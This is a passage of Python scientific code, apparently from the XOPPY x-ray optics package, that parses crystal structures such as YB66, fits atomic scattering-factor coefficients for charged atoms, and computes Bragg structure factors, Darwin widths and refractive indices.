# volume = float(a[1]) * float(a[2]) * float(a[3]) * \ # numpy.sqrt((1 - numpy.cos(alpha) ** 2 - numpy.cos(beta) ** 2 - numpy.cos(gamma) ** 2) + \ # 2 * numpy.cos(alpha) * numpy.cos(beta) * numpy.cos(gamma)) # for cubic: a*b*c volume = bragg_metrictensor(float(a[0]), float(a[1]), float(a[2]), float(a[3]), float(a[4]), float(a[5]), RETURN_VOLUME=1) cryst['volume'] = volume cell_data = numpy.array(sf[index_found].data) cryst['n_atom'] = cell_data.shape[1] atom = [] for i in range(cell_data.shape[1]): if cell_data.shape[0] == 5: # standard 5 columns atom.append({'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i],}) else: # 6 columns (charge) #'AtomicName' required to be compatible with my current code s = symbol_to_from_atomic_number(int(cell_data[0,i])) if cell_data[5, i] != 0: #charged s = s + f'%+g'%cell_data[5, i] atom.append({'AtomicName': s, 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': cell_data[5, i],}) cryst['atom'] = atom cryst['cpointer'] = None # TODO: Get and store anisotropic coeffs ANISO_KEY = "UANISO_COFF" #prefix for a line with anisotropic coefficients #tmp = sf[index_found].scan_header_dict["UANISO_COFF_B1"] d = sf[index_found].scan_header_dict AnisoItem = {'Name': ' ', 'start': 0, 'end': 0, 'beta11': 0.0, 'beta22': 0.0, 'beta33': 0.0, 'beta12': 0.0, 'beta13': 0.0, 'beta23': 0.0} a=[ (x, d[x].split()) for x in d if x[:len(ANISO_KEY)] == ANISO_KEY] if len(a) >0: #found anisotropic coefficients in the header, process them a=sorted(a,key=lambda x:int(x[1][0]),reverse=False) #sort by 'start' ascending, to avoid the order being changed by the SpecFile n = 0 for x in a: #tuple('UANISO_COFF_B1',[1 96 0.00038 0.00044 0.00039 0 0 0]) AnisoItem['Name']= x[0][len(ANISO_KEY)+1:] #site atom name ('B1', etc.): the key text after the prefix AnisoItem['start']= int(x[1][0]) AnisoItem['end']= int(x[1][1]) AnisoItem['beta11']= float(x[1][2]) AnisoItem['beta22']= float(x[1][3]) AnisoItem['beta33']= float(x[1][4]) AnisoItem['beta12']= float(x[1][5]) AnisoItem['beta13']= float(x[1][6]) AnisoItem['beta23']= float(x[1][7]) if n ==0: Aniso = numpy.array([AnisoItem.copy()]) else: Aniso = numpy.append(Aniso,[AnisoItem.copy()]) n = n + 1 cryst['Aniso'] = Aniso #the 'Aniso' key carries data only when anisotropic coefficients are present cryst['n_aniso']= n return cryst def crystal_atnum(list_AtomicName, unique_AtomicName, unique_Zatom,list_fraction, f0coeffs): """ Get the atoms and fractional occupation factors at the different sites. list_AtomicName: list of all atoms in the crystal unique_AtomicName: list of unique atomic names in the list unique_Zatom: list of unique atomic numbers list_fraction: list of fractional occupation factors return: num_e, fract, n_atom, n_ATUM: for each (atom, occupancy) group, the number of electrons, the fractional occupation factor, the number of atoms, and the atomic number """ import re from orangecontrib.xoppy.util.xoppy_xraylib_util import f0_xop num_e = [] fract = [] n_atom = [] n_ATUM = [] for k,x in enumerate(unique_AtomicName): tmp1 = re.search('(^[a-zA-Z]*)',x) if tmp1.group(0) == x: #AtomicName only, without valence info (i.e., B, Y, O) f0 = f0_xop(unique_Zatom[k]) else: #f0 = f0_xop(0,AtomicName=x) f0 = f0coeffs[x] icentral = int(len(f0)/2) F000 = f0[icentral] for i in range(icentral): F000 += f0[i] a=[list_fraction[i] for i,v in enumerate(list_AtomicName) if v==x] fac = list(set(a)) for y in fac: n = a.count(y) num_e.append(F000) fract.append(y) n_atom.append(n) n_ATUM.append(unique_Zatom[k])
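# Note: a species appears once per distinct occupancy value, so e.g. two B sites
# with different occupancies produce two separate entries in the four parallel lists.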
return num_e.copy(), fract.copy(), n_atom.copy(),n_ATUM.copy() def Crystal_GetCrystalsList(): """ get crystal names from Crystals.dat """ sf = SpecFile('Crystals.dat') crystals = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] crystals.append(name.split(' ')[1]) return crystals ``` #### File: yb66/discussion/f0coeffs_fit.py ```python import numpy from dabax_access_f0 import get_f0_coeffs_from_dabax_file, get_f0_from_f0coeff from symbol_to_from_atomic_number import symbol_to_from_atomic_number from scipy.optimize import curve_fit """ <NAME> <EMAIL>, <NAME>, <EMAIL> Interpolation of f0 coefficients for an atom with fractional charge """ def func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): return get_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) def get_f0_coeffs(atoms, list_Zatom): """ Return a Dict {"B-0.0455": [f0 coefficients], ..., "Y+3":[f0 coefficients],...} """ AtomicChargeList = {} #first row is the atomic number, it is an integer UniqueAtomicNumber = list(sorted(set(list_Zatom))) charge = [ atoms[i]['charge'] for i in range(len(atoms))] for x in UniqueAtomicNumber: AtomicChargeList[str(x)]= [] for i,x in enumerate(list_Zatom): if charge[i] not in AtomicChargeList[str(int(x))]: AtomicChargeList[str(int(x))].append(charge[i]) #Charge value return crystal_get_f0_coeffs(AtomicChargeList.items()) def crystal_get_f0_coeffs(AtomicList): """ Input: AtomicList, a list of tuples like {(5,[-0.0455,]), (39,[3,])}; the same atom is allowed to appear with different charges Out: A Dict {"B-0.0455": [f0 coefficients], ..., "Y+3":[f0 coefficients],...} """ f0coeffs = {} searchChargeNameNeg = ['1-','2-','3-','4-','5-','6-','7-'] searchChargeNamePos = ['1+','2+','3+','4+','5+','6+','7+'] qq = numpy.linspace(0,2,1000) #q = 0 to 2 for x in AtomicList: n = int(x[0]) #atomic number sym = symbol_to_from_atomic_number(n) f0 = get_f0_coeffs_from_dabax_file(entry_name=sym) if len(f0) == 0: raise Exception("cannot find f0 coefficients for '" + sym + "'") for charge in x[1]: #may have multiple valences for the same atom, B1+, B2+, etc k = int(charge) f01 = [] if charge < 0: if k == charge: #integer charge f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + searchChargeNameNeg[abs(k)-1]) if len(f01) == 0: ff = [] for i,s in enumerate(searchChargeNameNeg): f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + s) if len(f01) > 0: ff.append((-i-1,f01)) if (i+1) > abs(k): #already found an entry with valence beyond the charge carried by the atom break if len(ff) > 0: f01 = ff[-1] if len(f01) == 0 and 0 != charge: #no f0 found in the negative charge direction ff = [] for i,s in enumerate(searchChargeNamePos): #try to find one with positive charge f01 = get_f0_coeffs_from_dabax_file(entry_name=sym + s) if len(f01) > 0: ff.append((i+1,f01)) if (i+1) > abs(k) or charge < 0: break if len(ff) > 0: f01 = ff[-1] if charge == 0: #no fit needed for a neutral atom f0coeffs[sym] = f0 continue #the following applies to a charged atom if len(f01) == 0: raise Exception("No 2nd atom found for the linear fit of the f0 coefficients") if charge == f01[0]: #if the charged atom is already tabulated, just take it, no fit f0coeffs[sym+f'%+g'%charge] = f01[1] continue #do the fitting here f0_1 = get_f0_from_f0coeff(f0, qq) f0_2 = get_f0_from_f0coeff(f01[1], qq) f00 = f0_1 + charge / f01[0] * (f0_2 - f0_1) p0 = f0 #neutral f0 as the starting guess p0 #if the 2nd atom has a valence closer to the charge, use it instead of the neutral atom if abs(charge-f01[0]) < abs(charge): p0 = f01[1] f00_fit, pcov_fit = curve_fit(func, qq, f00, p0=p0) f0coeffs[sym+f'%+g'%charge] = f00_fit return f0coeffs if __name__ == "__main__": from srxraylib.plot.gol import 
plot, set_qt #from scipy.optimize import curve_fit set_qt() filename = "f0_InterTables.dat" coeffs_B = get_f0_coeffs_from_dabax_file(entry_name="B", filename=filename) # # f0 data # q = numpy.array([0,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9]) f0_B = get_f0_from_f0coeff(coeffs_B, q) f0_B3plus = numpy.array([2,1.995,1.979,1.954,1.919,1.875,1.824,1.766,1.703,1.566,1.42,1.274,1.132,0.999,0.877,0.767,0.669,0.582,0.507,0.441,0.384,0.335,0.293,0.256]) f0_Bdot = f0_B + (-0.0455) / 3 * (f0_B3plus - f0_B) # # fit # #def func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): # return get_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) popt_B3plus, pcov_B3plus = curve_fit(func, q, f0_B3plus, p0=coeffs_B) print("fitted B3+: ", popt_B3plus) popt_Bdot, pcov_Bdot = curve_fit(func, q, f0_Bdot, p0=coeffs_B) print("fitted Bdot: ", popt_Bdot) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, get_f0_from_f0coeff(popt_B3plus, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from srio fit"], title=filename) coeff_Bdot = numpy.array([0.858,0.89669,1.0756,2.118,0.095903,0.46461,1.2126,61.273,23.55]) plot(q, f0_Bdot, q, get_f0_from_f0coeff(coeff_Bdot, q), q, get_f0_from_f0coeff(popt_Bdot, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["Bdot original", "Bdot from Xiaojiang fit","Bdot from srio fit",], title=filename) print("fitted Bdot Xiaojiang: ", coeff_Bdot) print("fitted Bdot srio: ", popt_Bdot) # # add this block to f0_InterTables.dat # print("\n#S 5 B3+\n#N 9\n#L a1 a2 a3 a4 c b1 b2 b3 b4\n"+"%g "*9 % (tuple(popt_Bdot))) # # test remote B3+ # try: import os os.remove("f0_InterTables.dat") except: pass filename = "f0_InterTables.dat" coeffs_B3plus_remote = get_f0_coeffs_from_dabax_file(entry_name="B3+", filename=filename) coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, get_f0_from_f0coeff(popt_B3plus, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from remote f0_InterTables.dat"], title=filename) ``` #### File: discussion/widget/xoppy_xraylib_util2.py ```python import xraylib import numpy import os import scipy.constants as codata # <NAME>, <EMAIL> from orangecontrib.xoppy.util.temperature_anisotropy import TemperFactor #from orangecontrib.xoppy.util.xoppy_xraylib_util import f0_xop from orangecontrib.xoppy.util.Crystal_Atnum import Crystal_Atnum from orangecontrib.xoppy.util.Crystal_Parser import Crystal_Parser from orangecontrib.xoppy.util.Crystal_Parser import SymbolToAtomicNumber import re #------------------------------------------------------------------------- toangstroms = codata.h * codata.c / codata.e * 1e10 def f0_xop(Z,AtomicName=None): tmp = { '5':[ 2.11021585, 0.94826030, 1.03175074, 0.17991800, 0.72039282, 0.00538888, 21.36228681, 1.17425000, 65.42872639, 0.12888999, 0.44259026], '14':[ 4.98816795, 3.35710271, 1.50292204, 1.22172882, 2.76143663, 0.15142442, 2.53600438, 29.97580504, 0.08254945, 88.73513838, 1.16712390], '36':[17.53267157, 7.44816522, 267.89934293, 2.98742575, 6.61999042, -266.63403399, 1.82191497, 15.41761348, 0.00002029, 39.30642110, 0.14476941], 'B-.':[1.493, 1.0472, 0.7776, 0.64929, 1.0233, 0.050981, 21.37, 65.436, 0.36215, 21.354, 1.1387], 'Y3+':[6.3697, 10.29, 4.3719, 5.9527, 4.3852, 4.6028, 1.28, 13.169, 0.41449, 1.967, 1.2664] } # tmp = numpy.array(tmp) # return tmp[Z-1].copy() if Z > 0: return tmp[str(Z)].copy() if 
AtomicName not in tmp: raise Exception("f0 coefficients not found for AtomicName '%s'" % AtomicName) return tmp[AtomicName].copy() #AtomicName should contain an atomic string name def bragg_calc2(descriptor="YB66",hh=1,kk=1,ll=1,temper=1.0,emin=5000.0,emax=15000.0,estep=100.0,ANISO_SEL=0,fileout=None): """ Preprocessor for Structure Factor (FH) calculations. It calculates the basic ingredients of FH. :param descriptor: crystal name (as in xraylib) :param hh: miller index H :param kk: miller index K :param ll: miller index L :param temper: temperature factor (scalar <=1.0 ) :param emin: photon energy minimum :param emax: photon energy maximum :param estep: photon energy step :param fileout: name for the output file (default=None, no output file) :return: a dictionary with all ingredients of the structure factor. """ output_dictionary = {} codata_e2_mc2 = codata.e**2 / codata.m_e / codata.c**2 / (4*numpy.pi*codata.epsilon_0) # in m # f = open(fileout,'w') txt = "" txt += "# Bragg version, Data file type\n" txt += "2.4 1\n" #cryst = xraylib.Crystal_GetCrystal('YB66') cryst = Crystal_Parser(filename=descriptor) volume = cryst['volume'] #test crystal data - not needed itest = 0 if itest: print (" Unit cell dimensions are %f %f %f" % (cryst['a'],cryst['b'],cryst['c'])) print (" Unit cell angles are %f %f %f" % (cryst['alpha'],cryst['beta'],cryst['gamma'])) print (" Unit cell volume is %f A^3" % volume ) print (" Atoms at:") print (" Z fraction X Y Z") for i in range(cryst['n_atom']): atom = cryst['atom'][i] print (" %3i %f %f %f %f" % (atom['Zatom'], atom['fraction'], atom['x'], atom['y'], atom['z']) ) print (" ") #dspacing = xraylib.Crystal_dSpacing(cryst, hh, kk, ll) alpha = cryst['alpha'] * numpy.pi/180 beta = cryst['beta'] * numpy.pi/180 gamma = cryst['gamma'] * numpy.pi/180 dspacing = (volume / (cryst['a'] * cryst['b'] * cryst['c'])) * numpy.sqrt(1 / ( \ (hh * numpy.sin(alpha) / cryst['a'])**2 + (kk * numpy.sin(beta) / cryst['b'])**2 + \ (ll * numpy.sin(gamma) / cryst['c'])**2 + \ 2 * hh * kk * (numpy.cos(alpha) * numpy.cos(beta) - numpy.cos(gamma)) / (cryst['a'] * cryst['b']) + \ 2 * hh * ll * (numpy.cos(alpha) * numpy.cos(gamma) - numpy.cos(beta)) / (cryst['a'] * cryst['c']) + \ 2 * kk * ll * (numpy.cos(beta) * numpy.cos(gamma) - numpy.cos(alpha)) / (cryst['b'] * cryst['c']))) dspacing *= 1e-8 # in cm volume = volume*1e-8*1e-8*1e-8 # in cm^3 rn = (1e0/volume)*(codata_e2_mc2*1e2) txt += "# RN = (e^2/(m c^2))/V) [cm^-2], d spacing [cm]\n" txt += "%e %e \n" % (rn , dspacing) output_dictionary["rn"] = rn output_dictionary["dspacing"] = dspacing atom = cryst['atom'] list_Zatom = [ atom[i]['Zatom'] for i in range(len(atom))] list_fraction = [ atom[i]['fraction'] for i in range(len(atom))] list_x = [ atom[i]['x'] for i in range(len(atom))] list_y = [ atom[i]['y'] for i in range(len(atom))] list_z = [ atom[i]['z'] for i in range(len(atom))] unique_Zatom = set(list_Zatom) ## ------------ XJ.YU Singapore Synchrotron Light Source -------------------------- ## For backward compatibility if 'AtomicName' not in atom[0].keys(): cryst['Aniso']=[{'start':0}] for i in range(len(atom)): atom[i]['AtomicName']='' list_AtomicName = [ atom[i]['AtomicName'] for i in range(len(atom))] unique_AtomicName = list(sorted(set(list_AtomicName))) #unique_AtomicName has at least one empty string if unique_AtomicName[0] !='': #unique_Zatom is now changed from a set to a list, to allow duplicate atomic numbers, #because the same atom at different sites may have different valences, i.e., O2-, O1.5- unique_Zatom=[] for z in unique_AtomicName: tmp = re.search('(^[a-zA-Z]*)',z)
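# strip the valence suffix from the name (e.g. 'Y3+' -> 'Y') before converting the symbol to Z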
unique_Zatom.append(SymbolToAtomicNumber(tmp.group(0))) ## ------------ Singapore Synchrotron Light Source --------------------------------- TmpCrystal = () # for diff_pat.exe if unique_AtomicName[0] !='': #Complex crystal TmpCrystal = Crystal_Atnum(list_AtomicName, unique_AtomicName, unique_Zatom,list_fraction) nbatom = (len(TmpCrystal[0])) else: nbatom = (len(unique_Zatom)) txt += "# Number of different element-sites in unit cell NBATOM:\n%d \n" % nbatom nbatom = (len(unique_Zatom)) #keep the old nbatom output_dictionary["nbatom"] = nbatom txt += "# for each element-site, the atomic number\n" if unique_AtomicName[0] !='': #Complex crystal for i in TmpCrystal[0]: i = int(i + 0.5) #round to an integer value, diff_pat does not support floats txt += "%d "%i else: #normal crystals for i in unique_Zatom: txt += "%d "%i txt += "\n" if len(TmpCrystal) > 0: output_dictionary["atnum"] = list(TmpCrystal[0]) else: output_dictionary["atnum"] = list(unique_Zatom) #XJ.YU Singapore Synchrotron Light Source output_dictionary["zcol"] = list(list_Zatom) output_dictionary["unique_AtomicName"] = list(unique_AtomicName) output_dictionary["list_AtomicName"] = list(list_AtomicName) #TODO: manage fraction correctly, the ones in non-representative atoms are ignored. txt += "# for each element-site, the occupation factor\n" unique_fraction = [] if len(TmpCrystal) == 0: #normal crystal for i in range(len(unique_Zatom)): # #commented out by XJ.YU, <EMAIL> # always 1, not handled by diff_pat.exe # unique_fraction.append(list_fraction[i]) unique_fraction.append(1) txt += "%g "%(unique_fraction[i]) else: for z in TmpCrystal[1]: #fractional occupancies unique_fraction.append(z) txt += "%g "%(z) txt += "\n" # commented out by XJ.YU # output_dictionary["fraction"] = unique_fraction # # because even the same kind of atom at different sites can have a different occupancy (like B1, B2, etc. in YB66), # keep the original fraction list # output_dictionary["fraction"] = list_fraction #not unique_fraction, the full list txt += "# for each element-site, the temperature factor\n" # temperature parameter list_temper = [] if len(TmpCrystal) > 0: #complex crystal for i in TmpCrystal[1]: txt += "%5.3f "%temper #for diff_pat.exe for i in range(len(unique_Zatom)): list_temper.append(temper) txt += "\n" output_dictionary["temper"] = list_temper #not necessarily the same as diff_pat # # Geometrical part of structure factor: G and G_BAR # txt += "# for each type of element-site, COOR_NR=G_0\n" list_multiplicity = [] #when there are duplicate atomic numbers in unique_Zatom, counting by Z is not correct anymore; #use unique_AtomicName and list_AtomicName instead # comment by <NAME>, <EMAIL> if unique_AtomicName[0] =='': for z in unique_Zatom: txt += "%d "%list_Zatom.count(z) list_multiplicity.append(list_Zatom.count(z)) else: for z in unique_AtomicName: # txt += "%d "%list_AtomicName.count(z) list_multiplicity.append(list_AtomicName.count(z)) for z in TmpCrystal[2]: txt += "%d "%z txt += "\n" output_dictionary["G_0"] = list_multiplicity # # Consider the anisotropic temperature factor # <NAME>, <EMAIL> # A dummy dictionary Aniso with start=0 is used if no anisotropic temperature factor is input # start if cryst['Aniso'][0]['start']>0: TFac = TemperFactor( 1.0/(2.0*dspacing*1e8),cryst['Aniso'],Miller={'h':hh,'k':kk,'l':ll}, \ cell={'a':cryst['a'],'b':cryst['b'],'c':cryst['c']},n=len(atom)) B_TFac = 1 else: B_TFac = 0 # end # txt += "# for each type of element-site, G and G_BAR (both complex)\n" list_g = [] list_g_bar = [] tmp_g={} #added for diff_pat.exe: multiple different sites with the same atom for z in 
unique_Zatom: ga = 0.0 + 0j for i,zz in enumerate(list_Zatom): # comment out by <NAME> # add multiplied by occupancy and temperature factor # if zz == z: # ga += numpy.exp(2j*numpy.pi*(hh*list_x[i]+kk*list_y[i]+ll*list_z[i])) if zz == z: if B_TFac: TCoff = TFac[ANISO_SEL,i] else: TCoff = 1 ga += numpy.exp(2j*numpy.pi*(hh*list_x[i]+kk*list_y[i]+ll*list_z[i]))*list_fraction[i]*TCoff if len(TmpCrystal) == 0: #normal crystal txt += "(%g,%g) \n"%(ga.real,ga.imag) txt += "(%g,%g) \n"%(ga.real,-ga.imag) else: #temporay save here tmp_g[str(z)] = [(ga.real,ga.imag),(ga.real,-ga.imag)] list_g.append(ga) list_g_bar.append(ga.conjugate()) if len(TmpCrystal) > 0: #for diff_pat.exe for z in TmpCrystal[3]: #receive the G for atom at each site txt += "(%g,%g) \n"%tmp_g[str(z)][0] txt += "(%g,%g) \n"%tmp_g[str(z)][1] output_dictionary["G"] = list_g output_dictionary["G_BAR"] = list_g_bar # # F0 part # txt += "# for each type of element-site, the number of f0 coefficients followed by them\n" list_f0 = [] tmp_g={} #add for diff_pat.exe, multiple different sites with same atom for i,zeta in enumerate(unique_Zatom): #Comment: <NAME>, <EMAIL> #For complicate compound crystal, we use unique_AtomicName instead of atomic number to get f0 # if unique_AtomicName[0] !='': #with compound name input tmp1 = re.search('(^[a-zA-Z]*)',unique_AtomicName[i]) if tmp1.group(0) == unique_AtomicName[i]: #AtomicName only, without valence info (i.e., B, Y, O) tmp = f0_xop(zeta) else: tmp = f0_xop(0,AtomicName=unique_AtomicName[i]) else: tmp = f0_xop(zeta) # print(("%g "*11)%(tmp.tolist())) if len(TmpCrystal) == 0: #normal crystal txt += ("11 "+"%g "*11+"\n")%(tuple(tmp)) else: #temporaty save here tmp_g[str(zeta)] = tuple(tmp) # By XJ.Yu, return value already changed from array to list #list_f0.append(tmp.tolist()) list_f0.append(tmp) if len(TmpCrystal) > 0: #for diff_pat.exe for zeta in TmpCrystal[3]: #receive the f0 for atom at each site txt += ("11 "+"%g "*11+"\n")%(tmp_g[str(zeta)]) output_dictionary["f0coeff"] = list_f0 # f.write("# -----------------------------------------------\n") # zetas = numpy.array([atom[0]["Zatom"],atom[7]["Zatom"]]) # <NAME>, use ceil to round up, otherwise we may get actual max energy less than emax npoint = int(numpy.ceil(( (emax - emin)/estep + 1 ))) txt += "# The number of energy points NPOINT: \n" txt += ("%i \n") % npoint output_dictionary["npoint"] = npoint txt += "# for each energy point, energy, F1(1),F2(1),...,F1(nbatom),F2(nbatom)\n" list_energy = [] if len(TmpCrystal) > 0: #for diff_pat.exe tmp_len = len(TmpCrystal[3]) else: tmp_len = len(unique_Zatom) out_f1 = numpy.zeros( (tmp_len,npoint), dtype=float) out_f2 = numpy.zeros( (tmp_len,npoint), dtype=float) out_fcompton = numpy.zeros( (tmp_len,npoint), dtype=complex) for i in range(npoint): energy = (emin+estep*i) txt += ("%20.11e \n") % (energy) list_energy.append(energy) if len(TmpCrystal) > 0: #for diff_pat.exe tmp_g = TmpCrystal[3] else: tmp_g = unique_Zatom # for j,zeta in enumerate(unique_Zatom): for j,zeta in enumerate(tmp_g): f1a = xraylib.Fi(int(zeta),energy*1e-3) f2a = -xraylib.Fii(int(zeta),energy*1e-3) # TODO: check the sign!! 
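# f1a/f2a are the anomalous corrections f' and f'' evaluated at this energy point; they
# fill the per-site (rows) x per-energy (columns) tables stored below as
# output_dictionary["f1"] / output_dictionary["f2"], which crystal_fh2() later interpolates in energy.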
txt += (" %20.11e %20.11e 1.000 \n")%(f1a, f2a) out_f1[j,i] = f1a out_f2[j,i] = f2a out_fcompton[j,i] = 1.0 output_dictionary["energy"] = list_energy output_dictionary["f1"] = out_f1 output_dictionary["f2"] = out_f2 output_dictionary["fcompton"] = out_fcompton if fileout != None: with open(fileout,"w") as f: f.write(txt) print("File written to disk: %s" % fileout) return output_dictionary def crystal_fh2(input_dictionary,phot_in,theta=None,forceratio=0): """ :param input_dictionary: as resulting from bragg_calc() :param phot_in: photon energy in eV :param theta: incident angle (half of scattering angle) in rad :return: a dictionary with structure factor """ # outfil = input_dictionary["outfil"] # fract = input_dictionary["fract"] rn = input_dictionary["rn"] dspacing = numpy.array(input_dictionary["dspacing"]) nbatom = numpy.array(input_dictionary["nbatom"]) atnum = numpy.array(input_dictionary["atnum"]) temper = numpy.array(input_dictionary["temper"]) G_0 = numpy.array(input_dictionary["G_0"]) G = numpy.array(input_dictionary["G"]) G_BAR = numpy.array(input_dictionary["G_BAR"]) f0coeff = numpy.array(input_dictionary["f0coeff"]) npoint = numpy.array(input_dictionary["npoint"]) energy = numpy.array(input_dictionary["energy"]) fp = numpy.array(input_dictionary["f1"]) fpp = numpy.array(input_dictionary["f2"]) #<NAME>, <EMAIL> ZCOL = numpy.array(input_dictionary["zcol"]) FCOL = numpy.array(input_dictionary["fraction"]) UCOL = numpy.array(input_dictionary["unique_AtomicName"]) LCOL = numpy.array(input_dictionary["list_AtomicName"]) #--------------------------------------------------------- phot_in = numpy.array(phot_in,dtype=float).reshape(-1) toangstroms = codata.h * codata.c / codata.e * 1e10 itheta = numpy.zeros_like(phot_in) for i,phot in enumerate(phot_in): if theta is None: itheta[i] = numpy.arcsin(toangstroms*1e-8/phot/2/dspacing) else: itheta[i] = theta # print("energy= %g eV, theta = %15.13g deg"%(phot,itheta[i]*180/numpy.pi)) if phot < energy[0] or phot > energy[-1]: raise Exception("Photon energy %g eV outside of valid limits [%g,%g]"%(phot,energy[0],energy[-1])) if forceratio == 0: ratio = numpy.sin(itheta[i]) / (toangstroms / phot) else: ratio = 1 / (2 * dspacing * 1e8) # print("Ratio: ",ratio) F0 = numpy.zeros(nbatom) #<NAME>, <EMAIL> F000 = numpy.zeros(nbatom) for j in range(nbatom): icentral = int(f0coeff.shape[1]/2) F0[j] = f0coeff[j,icentral] F000[j] = F0[j] #<NAME>, <EMAIL> for i in range(icentral): F0[j] += f0coeff[j,i] * numpy.exp(-1.0*f0coeff[j,i+icentral+1]*ratio**2) F000[j] += f0coeff[j,i] #actual number of electrons carried by each atom, <NAME>, <EMAIL> # print("F0: ",F0,xraylib.FF_Rayl(int(atnum[j]),ratio)) # ;C # ;C Interpolate for the atomic scattering factor. 
# ;C for j,ienergy in enumerate(energy): if ienergy > phot: break nener = j - 1 F1 = numpy.zeros(nbatom,dtype=float) F2 = numpy.zeros(nbatom,dtype=float) F = numpy.zeros(nbatom,dtype=complex) for j in range(nbatom): F1[j] = fp[j,nener] + (fp[j,nener+1] - fp[j,nener]) * \ (phot - energy[nener]) / (energy[nener+1] - energy[nener]) F2[j] = fpp[j,nener] + (fpp[j,nener+1] - fpp[j,nener]) * \ (phot - energy[nener]) / (energy[nener+1] - energy[nener]) # print("F1,F2",F1,F2) r_lam0 = toangstroms * 1e-8 / phot for j in range(nbatom): F[j] = F0[j] + F1[j] + 1j * F2[j] # print("F",F) F_0 = 0.0 + 0.0j FH = 0.0 + 0.0j FH_BAR = 0.0 + 0.0j FHr = 0.0 + 0.0j FHi = 0.0 + 0.0j FH_BARr = 0.0 + 0.0j FH_BARi = 0.0 + 0.0j CI = 0.0 + 1.0j TEMPER_AVE = 1.0 #<NAME>, <EMAIL> #Occupancy for FH already included in G in Bragg_Calc function BOOL_UCOL = UCOL[0]=='' for j in range(nbatom): FH += G[j] * F[j] * 1.0 FHr += G[j] * (F0[j] + F1[j])* 1.0 FHi += G[j] * F2[j] * 1.0 #charged atom, the number of electrons not equal to atum anymore,while # it is euqal to F000, and notably, fractial occupancy need consideration here # occupancy till now, only consider in calculation of G, and G_BAR in bragg_calc #comment out: <NAME>, <EMAIL> # # F_0 += G_0[j] * ( atnum[j] + F1[j] + 1j * F2[j] ) * 1.0 # FN = F000[j] + F1[j] + CI * F2[j] if BOOL_UCOL: #normal crystal F_0 += FN*numpy.sum( numpy.where(ZCOL==atnum[j],FCOL,0.0)) else: #complicate compound crystals F_0 += FN*numpy.sum( numpy.where(LCOL==UCOL[j],FCOL,0.0)) TEMPER_AVE *= (temper[j])**(G_0[j]/(G_0.sum())) FH_BAR += (G_BAR[j] * F[j] * 1.0) FH_BARr += (G_BAR[j] * (F0[j] + F1[j]) *1.0) FH_BARi += (G_BAR[j] * F2[j] * 1.0) # print("TEMPER_AVE: ",TEMPER_AVE) # ;C # ;C multiply by the average temperature factor # ;C FH *= TEMPER_AVE FHr *= TEMPER_AVE FHi *= TEMPER_AVE FH_BAR *= TEMPER_AVE FH_BARr *= TEMPER_AVE FH_BARi *= TEMPER_AVE STRUCT = numpy.sqrt(FH * FH_BAR) # ;C # ;C PSI_CONJ = F*( note: PSI_HBAR is PSI at -H position and is # ;C proportional to fh_bar but PSI_CONJ is complex conjugate os PSI_H) # ;C psi_over_f = rn * r_lam0**2 / numpy.pi psi_h = rn * r_lam0**2 / numpy.pi * FH psi_hr = rn * r_lam0**2 / numpy.pi * FHr psi_hi = rn * r_lam0**2 / numpy.pi * FHi psi_hbar = rn * r_lam0**2 / numpy.pi * FH_BAR psi_hbarr = rn * r_lam0**2 / numpy.pi * FH_BARr psi_hbari = rn * r_lam0**2 / numpy.pi * FH_BARi psi_0 = rn * r_lam0**2 / numpy.pi * F_0 psi_conj = rn * r_lam0**2 / numpy.pi * FH.conjugate() # ; # ; Darwin width # ; # print(rn,r_lam0,STRUCT,itheta) ssvar = rn * (r_lam0**2) * STRUCT / numpy.pi / numpy.sin(2.0*itheta) spvar = ssvar * numpy.abs((numpy.cos(2.0*itheta))) ssr = ssvar.real spr = spvar.real # ;C # ;C computes refractive index. 
# ;C ([3.171] of Zachariasen's book) # ;C REFRAC = (1.0+0j) - r_lam0**2 * rn * F_0 / 2/ numpy.pi DELTA_REF = 1.0 - REFRAC.real ABSORP = 4.0 * numpy.pi * (-REFRAC.imag) / r_lam0 THETA_B =r_lam0/(1-(DELTA_REF/numpy.sin(itheta)**2))/2.0/dspacing THETA_B = numpy.arcsin(THETA_B) txt = "" txt += '\n******************************************************' txt += '\n at energy = '+repr(phot)+' eV' txt += '\n = '+repr(r_lam0*1e8)+' Angstroms' txt += '\n and at angle = '+repr(itheta*180.0/numpy.pi)+' degrees' txt += '\n = '+repr(itheta)+' rads' txt += '\n******************************************************' for j in range(nbatom): txt += '\n ' txt += '\nFor atom '+repr(j+1)+':' txt += '\n fo + fp+ i fpp = ' txt += '\n '+repr(F0[j])+' + '+ repr(F1[j].real)+' + i'+ repr(F2[j])+" =" txt += '\n '+repr(F0[j] + F1[j] + 1j * F2[j]) txt += '\n Z = '+repr(atnum[j]) txt += '\n Temperature factor = '+repr(temper[j]) txt += '\n ' txt += '\n Structure factor F(0,0,0) = '+repr(F_0) txt += '\n Structure factor FH = ' +repr(FH) txt += '\n Structure factor FH_BAR = ' +repr(FH_BAR) txt += '\n Structure factor F(h,k,l) = '+repr(STRUCT) txt += '\n ' txt += '\n Psi_0 = ' +repr(psi_0) txt += '\n Psi_H = ' +repr(psi_h) txt += '\n Psi_HBar = '+repr(psi_hbar) txt += '\n ' txt += '\n Psi_H(real) Real and Imaginary parts = ' + repr(psi_hr) txt += '\n Psi_H(real) Modulus = ' + repr(numpy.abs(psi_hr)) txt += '\n Psi_H(imag) Real and Imaginary parts = 